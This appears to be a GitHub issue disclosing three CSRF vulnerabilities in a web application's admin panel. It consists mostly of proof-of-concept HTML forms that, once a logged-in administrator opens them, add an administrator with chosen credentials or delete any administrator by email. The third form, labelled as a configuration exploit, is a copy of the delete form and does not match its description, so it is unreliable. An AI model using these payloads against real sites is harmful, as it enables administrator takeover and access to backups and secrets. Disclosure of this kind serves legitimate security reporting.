There is three CSRF vulnerability that can add the administrator account, delete administrator account, edit configuration.
piaolin opened this issue · 0 comments
piaolin commented
After the administrator logged in, open the following three pages:
1. add_admin.html
Add a administrator.
<html>
<body>
<form action="http://localhost:8888/admin/configure/users" method="POST" enctype="multipart/form-data">
<input type="hidden" name="email" value="321@com" />
<input type="hidden" name="password" value="321" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. delete_admin.html
Delete a administrator use username(email), and the param 'id' is not useful, you can delete any user you think username(email).
<html>
<body>
<form action="http://10.157.41.81:8888/admin/configure/users/delete" method="POST" enctype="multipart/form-data">
<input type="hidden" name="email" value="321@qq.com" />
<input type="hidden" name="id" value="80" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3. configure.html
It can edit configure, example:
1. Change HTTP Basic Auth User&Password to download a backup of your data via HTTP.
2. Change administrator email and used with add_admin.html.
3. Change Client Secret which is used to validate requests.
<html>
<body>
<form action="http://10.157.41.81:8888/admin/configure/users/delete" method="POST" enctype="multipart/form-data">
<input type="hidden" name="email" value="321@qq.com" />
<input type="hidden" name="id" value="80" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>